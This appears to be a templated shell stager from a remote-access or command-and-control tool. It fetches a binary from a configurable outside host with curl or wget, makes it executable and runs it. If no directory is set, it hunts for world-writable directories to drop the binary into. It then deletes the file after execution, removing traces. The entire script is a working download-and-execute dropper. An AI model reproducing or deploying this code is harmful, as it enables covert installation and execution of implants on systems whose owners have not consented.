#!/bin/sh
export PATH="$PATH:/usr/local/sbin:/usr/local/bin:/usr/bin:/bin:/sbin"



download () {

    if command -v curl &> /dev/null; then
        curl {{shq (printf "%s://%s:%s/%s" .Protocol .Host .Port .Name)}} -o "$1"/{{shq .Name}}
    elif command -v  wget &> /dev/null; then
        wget -O "$1"/{{shq .Name}} {{shq (printf "%s://%s:%s/%s" .Protocol .Host .Port .Name)}}
    fi

    chmod +x "$1"/{{shq .Name}}
}

{{if .WorkingDirectory}}

download {{shq .WorkingDirectory}}

{{shq .WorkingDirectory}}/{{shq .Name}}

rm {{shq .WorkingDirectory}}/{{shq .Name}}

{{else}}

for i in "~" "." $(find / -maxdepth 3 -type d \( -perm -o+w \)); do

    if ! touch "$i"/{{shq .Name}}; then 
        continue
    fi

    download "$i"

    if ! "$i"/{{shq .Name}}; then 
        continue
    fi

    rm "$i"/{{shq .Name}}

    break
done

{{end}}
